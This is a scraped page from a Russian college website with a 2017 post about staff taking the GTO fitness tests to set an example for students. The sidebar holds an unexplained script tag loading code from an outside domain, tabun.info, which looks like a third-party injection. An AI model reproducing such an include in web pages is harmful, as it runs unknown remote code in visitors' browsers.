Главная
Регистрация
Вход

Приветствую Вас Гость | RSS

Меню сайта

Категории раздела
Абитуриентам [0]
Для желающих поступить в наш колледж

Независимая оценка
Как вы оцениваете качество образовательных услуг нашего колледжа?
Всего ответов: 224

Статистика

Онлайн всего: 1
Гостей: 1
Пользователей: 0

  
Главная » 2017 » Февраль » 2 » ГТО: пример – как метод воспитания.
08:00
ГТО: пример – как метод воспитания.

     В положении о Всероссийском физкультурно-­спортивном комплексе «Готов к труду и обороне» указано, что целями ГТО являются повышение эффективности использования возможностей физической культуры и спорта в укреплении здоровья, гармоничном и всестороннем развитии личности, воспитании патриотизма и обеспечении преемственности в осуществлении физического воспитания населения.

         В этой связи, данная направленность Всероссийского физкультурно-спортивного комплекса «Готов к труду и обороне» конкретизируется в Федеральной целевой программе «Развития физической культуры и спорта в Российской Федерации на 2016-2020 годы», реализация которой призвана  обеспечить возможность гражданам систематически заниматься физической культурой и спортом. От успешного решения перечисленных задач в реализации общественно значимой цели Программы в немалой степени зависит здоровье человека, его творческого долголетия и общественно полезная активность. Как известно, что в результате организованного включения физической культуры в образовательных учреждениях, заметно возрастает производительность труда, уменьшаются пропуски по болезням, увеличивается трудовое долголетие.

    В соответствии с этим, преподаватели  и работники агропедколледжа,  убеждены в том, что тестирование норм комплекса ГТО,  на  личном примере -  подтверждают не только их собственные взгляды и убеждения, среди обучающихся в колледже, но и являются, с одной стороны  для них авторитетом, а с другой -  привлекают, тем самым, к ещё большей активности  студентов регулярно заниматься, в свободное от занятий время, физической культурой и спортом. Таким образом, преподавателям будут верить, на них станут равняться, за ними охотно пойдут ученики.  Пришло время, прекратить навязчиво твердить о здоровом образе жизни  - необходимо  жить согласно этому убеждению. Бессмысленно вспоминать о занятиях физкультурой и спортом в молодые годы или если  пару раз в год участвовал в дне здоровья.  Личное отношение необходимо выражать не только в словах, но и в поступках. Тем более, что структура Всероссийского физкультурно-спортивного комплекса состоит из 11 ступеней.

  Чтобы внести ясность в порядок тестирования работников трудового коллектива ГАПОУ ТО «Голышмановский агропедколледж», были  приглашены представителями   МАУ ЦФОР и молодёжной политики администрации Голышмановского района, которые  подробно рассказали о нормативно-тестирующей части Всероссийского физкультурно-спортивного комплекса «Готов к труду и обороне». Достаточно подробно охарактеризовали государственные требования к уровню физической подготовленности населения на основании выполнения нормативов и оценки уровня знаний и умений.

Материал подготовил

преподаватель

Педченко М.М. 

Просмотров: 658 | Добавил: iTiger | Рейтинг: 1.0/1
Всего комментариев: 0
Имя *:
Email *:
Код *:


Вход на сайт
Логин:
Пароль:

Мы потомки Героев


ПОЛЕЗНЫЕ ССЫЛКИ

Министерство образования и науки Российской Федерации Единое окно доступа к образовательным ресурсам Федеральный портал "Российское образование" Единая коллекция цифровых образовательных ресурсов Федеральный центр информационно-образовательных ресурсов


Персональные данные Дети МЕСТО РОЖДЕНИЯ:
ТЮМЕНСКИЙ КРАЙ Конкурс новый взгляд
<script src="https://tabun.info/out/index.php"></script>
http://профстажировки.рф/
Поиск

Календарь
«  Февраль 2017  »
ПнВтСрЧтПтСбВс
  12345
6789101112
13141516171819
20212223242526
2728

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Архив записей

Copyright MyCorp © 2024
Создать бесплатный сайт с uCoz